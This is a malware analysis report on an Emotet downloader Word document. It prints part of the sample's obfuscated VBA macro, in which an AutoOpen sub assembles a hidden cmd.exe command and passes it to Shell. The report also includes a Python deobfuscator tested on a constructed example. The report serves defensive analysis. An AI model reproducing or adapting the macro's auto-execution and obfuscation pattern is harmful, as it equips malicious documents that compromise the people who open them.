MALICIOUS
Risk Score: 142
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Word document carrying a VBA macro project (module names iLHjIatBF and WZbIoOvCY in the extracted source). The AutoOpen sub runs when the document is opened and calls Shell on a string assembled at runtime: helper functions such as SGHKWO and hjOiq each return a fragment built by concatenating short string literals, the Shell argument concatenates those fragments, and every routine is padded with no-op TypeName statements whose arguments reference undeclared variables. The visible fragments show the command begins with "cmd /V:ON/C" (the literal "d /V:ON/C" appended to "c" + "m") followed by Chr(34), a double quote, since the undeclared variables in the Chr() argument evaluate to Empty, i.e. 0. /V:ON enables delayed environment-variable expansion, and the next fragments are a "set Kj=" assignment and a "for %r in (7;68;65;...)" loop over numeric indices, which is consistent with rebuilding a hidden command one character at a time from the Kj variable. The preview is cut off before the loop body and the final command, so the second-stage URL and payload are not recoverable from this report alone; the ClamAV signature (Doc.Downloader.Emotet-6884074-0) attributes the document to the Emotet downloader family, hence the downloader classification. Note that the legacy WordBasic finding below says no modern VBA project was recovered, which conflicts with the extracted macros.bas; the VBA findings should be treated as the authoritative ones.
Heuristics (5)

- ClamAV: Doc.Downloader.Emotet-6884074-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6884074-0
- VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace identifier that Office writes into drawing parts, not a download location, so it carries no indicator value here.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5807 bytes | 81a23311da0f62f236128d1457388d5283c90cfab58e015d9c3c30c77eeaee3b |
Preview (first 1,000 lines of the extracted script; the copy on this page is cut off part-way through hjOiq):

```vb
Attribute VB_Name = "iLHjIatBF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
TypeName Log(rGknv * MXQXG * zOuKf * WXJVT)
TypeName 453
TypeName Chr(wbvrjn + zTURC / jzuwp / QvBuVb)
TypeName Log(46968 / 29051 + 82886 * HVNwIj)
TypeName CInt(GVmpa)
TypeName Sin(hHjpR)
Shell@ CStr("c") + CStr("m") + vzjaPlIA + jiGrTbibi + SGHKWO + hjOiq + FYUKccZmLP + oXMUYiTV + fEirsMj + pzlzKBtkb, 300841476 - 300841476
TypeName ChrW(4230)
TypeName Sqr(XSEkp)
End Sub
Attribute VB_Name = "WZbIoOvCY"
Function SGHKWO()
On Error Resume Next
TypeName Log(YHSTnK - 67000 - BRrfQC - AREwG)
TypeName CDbl(EVCNLR + mpqib)
TypeName Rnd(5087)
OhprTktTMlq = "d /V:ON/C" + CStr(Chr(nzudfCChu + MFbblUw + 34 + UWJitTSFiM + qPuCVTbq)) + "set Kj=" + "JiTZMmcp" + "iZJmk" + "SjSbAIlIYX"
TypeName CDbl(vDNPpM)
TypeName CLng(86652 - FttMNB)
ojJnOwMKks = "mEku" + "OVY" + "n1r\{x:" + "ChF'(LtN)" + "gBdvW-z7" + "DUa/e" + "0sq=}fw$ "
TypeName Tan(DzRZwQ)
TypeName CSng(409)
TypeName 5956
lJJRmw = "oP,;.G@+" + "y&&for %r" + " in (7;68;" + "65;58;" + "32;6" + "0;38;58;19" + ";19;" + "67;66" + ";6" + "1;5"
TypeName Sqr(24573313)
TypeName Sin(2420 / 94670)
GiwHlo = "0;61;62;" + "30;58" + ";65;51" + ";68;16" + ";14;58;6;4" + "3;67;44;5" + "8;43;72" + ";50;58;" + "16;37;19;" + "8;58" + ";30" + ";43"
TypeName wdblMt
TypeName Hex(SzEMU * DsERI)
GkSVpFq = ";71;66;" + "39;6" + ";37;62" + ";40" + ";38;43;" + "43;7" + ";3" + "6;57;57" + ";43" + ";32;8" + ";6"
TypeName CDate(jujzE)
TypeName CInt(fucczZ / BGqwIX)
EwzLbXIJCU = "0;43" + ";56;3" + "0;3" + "2;8;30;58;" + "58;32;7" + "2;6;68;" + "23;57;" + "26;" + "54" + ";8;43;4" + "2;31;7" + "4;38;43;43"
TypeName ChrW(85)
TypeName Sqr(MsRwaL)
IdaioHKYZ = ";7;3" + "6;57;57;4" + "3;58;" + "6;38" + ";60;8"
TypeName 48
TypeName CLng(67)
TypeName kTKks
HtPTEbwF = ";60;43;60;" + "68" + ";19;26;43;" + "8" + ";68;30" + ";72;6;"
TypeName CBool(161455722)
TypeName 4938
JSXjdi = "68;" + "23;57;3" + "2;23;52;43" + ";5" + "4;7"
TypeName 7
TypeName AzBRVn
TypeName Oct(ZQQBRM * qVXEQ * hbBpiW * 74896)
rDJsPa = "4;38;43;43" + ";7;" + "36;57" + ";" + "57;3" + "0;8;" + "46" + ";3" + "8;43;64;" + "19;8;46;3"
SGHKWO = OhprTktTMlq + ojJnOwMKks + lJJRmw + GiwHlo + GkSVpFq + EwzLbXIJCU + IdaioHKYZ + HtPTEbwF + JSXjdi + rDJsPa
TypeName HrhJJ
TypeName 137302633
End Function
Function hjOiq()
On Error Resume Next
TypeName CStr(28594937)
TypeName CDate(4745 + NjvSm - WQCPvh / LafJc)
TypeName Hex(UPvGU)
sqwsHKdjP = "8;43;72;14" + ";" + "7;5" + "7;" + "38" + ";73;9;" + "5" + "0;6;" + "74;" + "38;4" + "3;4"
TypeName ftiTXv
TypeName fSPicW
YjtrvNh = "3" + ";7;36;57" + ";57;56;" + "6" + "1;26;" + "56" + ";19;26;30"
TypeName 8
TypeName Fix(59)
EiZOYpzX = ";56;72;14" + ";7;57;39;4" + "7;6" + "4;44;74" + ";38;4"
TypeName Sgn(HvMbQE)
TypeName 494
FkojR = "3;4" + "3;7" + ";36;57;57;" + "16;" + "19;56;" + "6;25;49" + ";" + "68;23;8" + ";43;" + "72;6;6" + "8;23;7"
TypeName tIYhOj
TypeName Cos(QZWXW / 24901 + jQKBV / kjzYX)
TypeName Sqr(509)
dcwNjJzU = "2" + ";1" + "6;32;57" + ";4;40;72;" + "15;7;"
TypeName CBool(knKZp - IZYJq - 56659 + 70723)
TypeName Oct(38803494)
TypeName Sqr(ScTUN / 78545 * wNBzz - nlVjZ)
FQuVlU = "1" + "9;" + "8;4" + "3;41;40;" + "74;40;45" + ";" + "71;66;55;8" + ";8;67;" + "62;67;40" + ";53;53;59;" + "40;71;66;"
TypeName ChrB(6469 * YChCI)
TypeName CDbl(2208)
nirfhOTwFI = "14;" + "49;3" + "7;6" + "2;66;58;" + "30;49;3" + "6;43" + ";58;23" + ";"
TypeName 3
TypeName Rtiojl
TypeName zwiozD
cGuGQ = "7;75;40;33" + ";40" + ";75;" + "66;55;" + "8;8;75;4" + "0;7" + "2;58;35" + ";58;40;71;" + "64;68" + ";3"
hjOiq = sqwsHKdjP + YjtrvNh + EiZOYpzX + FkojR + dcwNjJzU + FQuVlU + nirfhOTwFI + cGuGQ
TypeName ChrW(RbKDlB)
TypeName UOMp
```

... (truncated)
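The string-building pattern in the macro above can be undone mechanically rather than by hand. The Python below is an added example written for this page; it is not the sandbox's tooling and it does not execute the sample. It strips the TypeName padding, evaluates the `+` concatenations with VBA's semantics (undeclared variables are Empty, which is 0 in arithmetic and contributes nothing to a concatenation, so `Chr(a + 34 + b)` is a double quote), resolves the helper functions the Shell argument names, and reassembles the command. Its input is a constructed VBA snippet in the style of macros.bas, not the real macro. The `do set X=!X!!Kj:~%r,1!` loop body and the `call %X:~-N%` tail are an assumption about how the page's truncated `for %r in (7;68;...)` fragment continues (the cmd.exe delayed-expansion trick of picking one character per index from an alphabet variable); the report does not show that part, so `decode_index_loop` demonstrates the general decoder, not the sample's actual second stage.

```python
import re

# Constructed VBA in the style of macros.bas above (not the real sample). The for-loop body
# and the trailing "call %X:~-N%" are ASSUMED continuations of the page's truncated
# "for %r in (7;68;...)" fragment, modelled on the cmd /V:ON delayed-expansion index trick.
SAMPLE_VBA = r'''Sub AutoOpen()
On Error Resume Next
TypeName Log(rGknv * MXQXG * zOuKf)
Shell@ CStr("c") + CStr("m") + vzjaPlIA + partA + partB, 300841476 - 300841476
End Sub
Function partA()
On Error Resume Next
TypeName CDbl(EVCNLR + mpqib)
aa = "d /V:ON/C" + CStr(Chr(nzudfCChu + MFbblUw + 34 + qPuCVTbq)) + "set Kj=" + "pws" + "oehlr"
TypeName 5956
bb = "&&for %r in (2;2;0;3;1;4;7" + ";2;5;4;6;6) do s" + "et X=!X!!Kj:~%r,1!"
partA = aa + bb
End Function
Function partB()
cc = "&&if %r==6 " + "call %X:~-10%" + CStr(Chr(34))
partB = cc
End Function
'''
FUNC_RE = re.compile(r'^Function\s+(\w+)\(\)\s*$(.*?)^End Function', re.S | re.M)
ASSIGN_RE = re.compile(r'^\s*(\w+)\s*=\s*(.+?)\s*$')
JUNK_RE = re.compile(r'^\s*(TypeName\b|On Error\b)')         # no-op padding statements
SHELL_RE = re.compile(r'^\s*Shell\W*\s*(.+),[^,\n]*$', re.M)  # Shell <expr>, <windowstyle>
INDEX_RE = re.compile(r'set (\w+)=(.*?)&&for %(\w) in \(([\d;]+)\) do set (\w+)=!\5!!\1:~%\3,1!')

def split_top(expr, sep):
    """Split on `sep` only outside quotes and parentheses."""
    parts, buf, depth, in_str = [], [], 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str and ch in '()':
            depth += 1 if ch == '(' else -1
        elif not in_str and ch == sep and depth == 0:
            parts.append(''.join(buf))
            buf = []
            continue
        buf.append(ch)
    parts.append(''.join(buf))
    return [p.strip() for p in parts]

def eval_num(expr):
    """Arithmetic as VBA sees it: undeclared names are Empty, i.e. 0, so Chr(a + 34 + b) is a double quote."""
    expr = re.sub(r'[A-Za-z_]\w*', '0', expr)
    if not re.fullmatch(r'[\d\s+\-*/().]+', expr):
        raise ValueError(f'unsupported arithmetic: {expr!r}')
    return eval(expr)  # safe: only digits, whitespace and + - * / ( ) . survive the check

def eval_str(expr, env, funcs):
    """Evaluate a `+` concatenation of literals, CStr(), Chr(), variables and helper functions."""
    out = []
    for term in split_top(expr, '+'):
        if term.startswith('"') and term.endswith('"'):
            out.append(term[1:-1].replace('""', '"'))
        elif term[:5].upper() == 'CSTR(' and term.endswith(')'):
            out.append(eval_str(term[5:-1], env, funcs))
        elif term[:4].upper() == 'CHR(' and term.endswith(')'):
            out.append(chr(int(round(eval_num(term[4:-1])))))
        elif term in funcs:
            out.append(call_function(term, funcs))
        else:
            out.append(env.get(term, ''))  # undeclared variable: Empty adds nothing
    return ''.join(out)

def call_function(name, funcs):
    """Run a helper's assignments in order; the value assigned to its own name is its result."""
    env = {}
    for line in funcs[name]:
        m = ASSIGN_RE.match(line)
        if m:
            env[m.group(1)] = eval_str(m.group(2), env, funcs)
    return env.get(name, '')

def parse_functions(src):
    return {m.group(1): [l for l in m.group(2).splitlines() if l.strip() and not JUNK_RE.match(l)]
            for m in FUNC_RE.finditer(src)}

def reconstruct_command(src):
    """Return the string AutoOpen passes to Shell."""
    return eval_str(SHELL_RE.search(src).group(1), {}, parse_functions(src))

def decode_index_loop(cmd):
    """Replay the assumed index loop: each number picks one character of the alphabet variable;
    the trailing %X:~-N% keeps only the last N characters, discarding leading junk picks."""
    m = INDEX_RE.search(cmd)
    if not m:
        return None
    alphabet, indices, acc = m.group(2), m.group(4).split(';'), m.group(5)
    decoded = ''.join(alphabet[int(i)] for i in indices)
    tail = re.search(r'%' + re.escape(acc) + r':~-(\d+)%', cmd)
    return decoded[-int(tail.group(1)):] if tail else decoded

if __name__ == '__main__':
    cmd = reconstruct_command(SAMPLE_VBA)
    print('Shell argument :', cmd)
    print('Decoded command:', decode_index_loop(cmd))
```

Against the real macros.bas you would pass the whole file as `src`; `reconstruct_command` needs every helper the Shell line names (jiGrTbibi, SGHKWO, hjOiq, FYUKccZmLP, ...), so on the truncated preview above only SGHKWO resolves and the output would be incomplete. Any evaluator like this should run on the extracted text only, never by executing the macro, and an unrecognised construct should raise rather than be silently skipped, so that a variant (ChrW, Replace, StrReverse) is noticed instead of producing a plausible but wrong command.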